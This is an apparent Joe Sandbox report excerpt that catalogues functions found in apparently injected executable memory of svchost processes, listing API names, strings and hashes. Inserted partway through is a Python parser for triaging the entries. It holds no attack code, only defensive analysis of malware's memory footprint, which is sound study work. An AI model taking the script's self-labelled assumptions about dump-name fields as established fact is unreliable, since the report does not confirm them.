• Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction ID: 35d6f73adecf76b2e3ecaee93454b03218b5995e470e293602ffafe4bc405b43
                                                                      • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction Fuzzy Hash: DE61BDB651EB49C6E760CB16E49436AB7A2F388794F581125EA8F47BB8DB7CC540CF00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: f9a8c0488bc3d4deea02a29900cc9a1534e547037d25a2bef2725409dacae6a9
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: E8118FF6A1AA9321FA64556AD4D73F612536B783E8E0C0E34A9770E7F6CF2CC8614601
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 5d1ff030d00cd2d713d849fa80cc5a6bdae8e42945106595b2b3d385686a6c18
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: CC1191B2A1EB1311FAA615ECE4D53F911D36B58374F4C9738AD6B06FF68B2CC8415500
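The two entries above carry the same Opcode ID (9af7c444…) but different Instruction IDs, and they come from two different memory regions of the same svchost process (0x1FB539C0000 and 0x1FB53990000, both "based on PE: true"): the same function body exists at two locations, with only the address-dependent bytes differing. The following Python is an added example, not Joe Sandbox code, that parses these flattened per-function entries, groups them by Opcode ID to surface such cross-region duplicates, and decodes the dotted dump-file name. The process field (0x42 = 66) matches the `hcaresult_66_…` snapshot name on the page; the reading of the later fields as a page protection (0x40 = PAGE_EXECUTE_READWRITE) and memory type (0x20000 = MEM_PRIVATE) is an assumption based on the standard Windows constants, not something the report states. The sample input is transcribed from the three entries shown on this page.

```python
import re
from collections import defaultdict

# Constructed sample input: three function entries transcribed from the
# report above (bullets and indentation removed, nothing else changed).
SAMPLE = """\
Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: f9a8c0488bc3d4deea02a29900cc9a1534e547037d25a2bef2725409dacae6a9
Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 5d1ff030d00cd2d713d849fa80cc5a6bdae8e42945106595b2b3d385686a6c18
Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: 02050852133c47cbee4d85a20b7f67a6a3ee0c205252fbf7605758d57af0b57c
"""

# ASSUMPTION: the 5th and 7th dotted fields of a dump name are the region's
# page protection and memory type, read against the Windows constants.
# The page does not document these fields; 'seq', 'f6' and 'f8' are left opaque.
PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
           0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

DUMP_RE = re.compile(
    r"^(?P<pid>[0-9a-f]{8})\.(?P<run>[0-9a-f]{8})\.(?P<seq>\d+)\.(?P<base>[0-9a-f]{16})"
    r"\.(?P<protect>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\.(?P<mtype>[0-9a-f]{8})"
    r"\.(?P<f8>[0-9a-f]{8})\.sdmp$", re.IGNORECASE)


def parse_dump_name(name):
    """Decode one '*.sdmp' file name into process id, base address, protection and type."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError("unrecognised dump name: " + name)
    protect = int(m["protect"], 16)
    mtype = int(m["mtype"], 16)
    return {
        "pid": int(m["pid"], 16),            # 0x42 -> 66, matching 'hcaresult_66_...'
        "base": int(m["base"], 16),
        "protect": PROTECT.get(protect, hex(protect)),
        "type": MEM_TYPE.get(mtype, hex(mtype)),
        # Executable, writable and private (not image-backed) memory holding a PE
        # is the usual footprint of a manually mapped / injected module.
        "rwx_private": protect == 0x40 and mtype == 0x20000,
    }


def parse_entries(text):
    """Split the flattened report text into one dict per function entry."""
    entries, cur = [], None
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":              # each entry starts with its dump source
            cur = {}
            entries.append(cur)
            dump, _, rest = value.partition(", ")
            cur["dump"] = parse_dump_name(dump)
            cur["based_on_pe"] = rest.endswith("based on PE: true")
        elif cur is not None:
            cur[key] = value
    return entries


def split_api_string_id(value):
    """'4061214504-1276376045' -> (api_hash, string_hash); second part is 0 when String ID is empty."""
    api, _, string = value.partition("-")
    return int(api), int(string)


def shared_opcode_ids(entries):
    """Opcode IDs seen in more than one memory region: same code, different location."""
    regions = defaultdict(set)
    for e in entries:
        regions[e["Opcode ID"]].add(e["dump"]["base"])
    return {oid: sorted(bases) for oid, bases in regions.items() if len(bases) > 1}


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for e in parsed:
        d = e["dump"]
        print(f"pid {d['pid']} base {d['base']:#x} {d['protect']} {d['type']} "
              f"PE={e['based_on_pe']} api={e['API ID']} rwx_private={d['rwx_private']}")
    for oid, bases in shared_opcode_ids(parsed).items():
        print("shared across regions:", oid[:16], [hex(b) for b in bases])
```

Run over the whole function listing of a report, `shared_opcode_ids` gives a quick picture of how many of the injected functions are duplicated between the two regions; the decoded protection and type of each region is what you would confirm against a live memory scan (for example, by walking the target's regions with VirtualQueryEx) before trusting the assumed field meanings.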
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: f68e625ba7acd24a59fe08d2c251c553b64a170b309e681ffe222c22834a18b8
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: 9661A1F360E24242FA698B64D4E03FEA7A3E745742F5D4535CA1B177B4DB3CC8458A60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: bedfb9b5bf910b629efd52c6bf81bea48cf952128bd26ee9357b23212e3a9e3e
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 27614C7261AB898AE710DF65D4803ED77A2F348B88F084225EF4A17BA9DB3CD555C701
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: dab5994280bf0e8b86b40aef4342addec26e55d86bcc80a1a6ecae4785b560e1
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 1051C0B212938A8AEB748F15D5C43B977A2F755B94F1C4135DA8A47BE5CB3CC450C702
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: e67ae822c152f91a8f128c44beafeeb84265359930fac9f4cc8cbbf4076c63b1
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: B8519FB3109282CAEB748B15D4A43AD77A2F359B94F1C5125DA9A87BA5CB3CD460CF02
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: c962e0a8b14c83a09ed27bc9a3309a2cbfdf0f654e531ad194cbd062dad2bbc8
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 7851A0B371E2028BEB56CB15D494BE8379AF354B98F588178DA07477A8EB38CC45CB05
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 608a93562e2c18e35ab68ab54ccf2d1a6f83fad5714ed2d3758c5d6ebae4ab62
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: 1431BEB321E641D6E712DF11E8947E937AAF740B88F088128EE4B077A8CB3CC940CB05
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction ID: 70b94840535153a2c256647204e39846594304de18c1bbc617468f21897222c2
                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction Fuzzy Hash: D0D105B271AA8189F711CF75D4803EC7BB2F754798F188625CE9A97BA9DB38C406C340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction ID: bdc4653b437380b3f3f4ca15b24486875ab127c3d64caf90ce25882780f20bf3
                                                                      • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction Fuzzy Hash: 0901807260AAD6D6E704DF62E8851AA67A2F749FC1F484834DA8A43725DF38C051C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction ID: 40f7c5f63300661cd661e55aa19decf58a802a22f31068c6dfd4796ed8c75239
                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction Fuzzy Hash: D291E4B270A65285F7609F65D4C23FDABA2B705B88F1C4529DE8B577A4DB7DC842C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction ID: defa4ae0642d6a32399fd8954af5e6e6148f63eaf2e33393bd27ecb724b6d61b
                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction Fuzzy Hash: 31115A72715F428AEB00CF61E8953B933A4F319759F480E31DA6E867A4DB7CC1988380
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction ID: bb72addb5a8917fd1520e25578be5bde8718d817993148d3e88a25d5e77b9b06
                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction Fuzzy Hash: 7571A4B620978685EB25DF29D8C43FAA7A6F385784F4C0036DD8B53BA9DB3DC6458700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 3341bbce40f2fc636230826d8423e9b0d65deab6b2a0a9c3cd1c9539a72497e8
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 7761927360AB468AEB10DF65D4907ED77A2F344B88F084225EF4A17BA8DB38D595CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction ID: 1e2d7e75fcec33aae6cfda06d1fedda4746025f1c3ce262bf2523ed21a116398
                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction Fuzzy Hash: 305184B220E78B82EA64DA29E4D83FAE792F395740F4D0135DD9B03B6ADB3DC5058740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction ID: ecc2ab4eee834b5eb349c99eeea2a38c23bc3884ca80047f2a69e4f6d83fdaf1
                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction Fuzzy Hash: FB41A8B271AA8185EB20DF25E4853F9B7A1F798794F584431EE8E877A4DB7CC441C740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction ID: 0434695ab50d31999ccfb44931bc123f96a23a80cf5f0d546cb8bc6dfc13b013
                                                                      • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction Fuzzy Hash: E6112B76219B8582EB618B15E4803A9B7E6FB88B94F5C4225EE8D07B69DF3CC551CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction ID: c69f2d03e7c10632b7f5d63e6c16b7762b360b625939375ae85a8f999810678c
                                                                      • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction Fuzzy Hash: 2EE086B1749B4590DF028F21E8902E833A1DBA8B64F8C9232995D0A321FB3CD5E9C301
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction ID: f00d30d7b76d42afc42083ec7512426173d9921f52db44da75f216fa2e63f94c
                                                                      • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction Fuzzy Hash: 2EE086B1709B4590DF028F21E8901E87361E7A8B54F8C9232C94D0A321EB3CD5E5C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction ID: 6aa450c30a7baaebf75d86072b728c595605062254c08432bf4957f3f5be0a0b
                                                                      • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction Fuzzy Hash: B6116375606B8A81FA04DB56D4852BA67A2F789FC0F5C4035DE4E43775DF3CC4418340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction ID: 5be64a25ae3680dda377404a020bb3eed52e059bff3fe1fe1c5071d9c80fb988
                                                                      • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction Fuzzy Hash: 18E0657560264586F7048F92D84939B3BE2FB89F45F48C424C94A07361DF7D8495C750

                                                                      Execution Graph

                                                                      Execution Coverage:0.7%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:66
                                                                      Total number of Limit Nodes:2

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction ID: 3351c60c845fd7169fdfdb9f14dc5b268d6217c379f2eec7515d69f6ca4aac72
                                                                      • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction Fuzzy Hash: 82E039356417048AFB068BE2D8497AA36E1EB9AB1AF049028890A47351DF7EC499C791

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: 0989cddc6aaa1a1faba2074b06e92315ed3e7b45a9aad1d7a4383a5ef0838ee0
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: 71115A366DC700A6F76097E0AAC7FF92296A748B1FF404128990FC1592FF7BC044C280

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 000001CBD8BD1628: GetProcessHeap.KERNEL32 ref: 000001CBD8BD1633
                                                                        • Part of subcall function 000001CBD8BD1628: HeapAlloc.KERNEL32 ref: 000001CBD8BD1642
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD16B2
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD16DF
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD16F9
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1719
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD1734
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1754
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD176F
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD178F
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD17AA
                                                                        • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD17CA
                                                                      • Sleep.KERNEL32 ref: 000001CBD8BD1AD7
                                                                      • SleepEx.KERNELBASE ref: 000001CBD8BD1ADD
                                                                        • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD17E5
